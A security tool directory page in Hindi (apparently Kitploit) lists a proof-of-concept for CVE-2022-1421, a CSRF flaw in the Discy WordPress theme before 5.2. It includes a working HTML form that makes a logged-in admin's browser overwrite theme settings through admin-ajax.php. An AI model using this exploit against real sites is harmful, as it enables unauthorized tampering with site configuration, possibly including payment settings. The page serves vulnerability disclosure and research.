Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2022-1421 — CVE-2022-1421 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, Discy WordPress थीम में एक CSRF कमजोरी, जो क्राफ्टेड AJAX अनुरोधों के माध्यम से एडमिन सेटिंग्स में बदलाव की अनुमति देती है। | Kitploit
उपकरण/GitHubGitHub/nb1b3k/cve-2022-1421
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षा
GitHubnb1b3k/cve-2022-1421

CVE-2022-1421

CVE-2022-1421 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, Discy WordPress थीम में एक CSRF कमजोरी, जो क्राफ्टेड AJAX अनुरोधों के माध्यम से एडमिन सेटिंग्स में बदलाव की अनुमति देती है।

रिपॉजिटरी देखें
733 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2022-1421

CVE-2022-1421 के लिए एक प्रूफ-ऑफ-कॉन्सेप्ट

Discy < 5.2 - CSRF के माध्यम से सेटिंग्स अपडेट

Discy < 5.2 में कुछ AJAX कार्रवाइयों में CSRF जाँचों का अभाव है, जिससे एक हमलावर लॉग इन किए हुए एडमिन से CSRF हमले के माध्यम से प्लगइन की मनमानी सेटिंग्स (भुगतान विधियों सहित) बदलने में सक्षम हो सकता है।

प्रभावित थीम

Discy < 5.2

POC

root@kitploit:~
<html>
  <body>
    <form action="https://target.com/wp-admin/admin-ajax.php" method="POST">
      <input type="hidden" name="action" value="discy_update_options">
      <input type="hidden" name="data" value="discy_options[footer_copyright]=You%20are%20ultra-PWNED">
      <input type="submit" value="Submit request">
    </form>
  </body>
</html> 

संदर्भ

https://wpscan.com/vulnerability/a7a24e8e-9056-4967-bcad-b96cc0c5b249

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1421

टूल डाउनलोड करें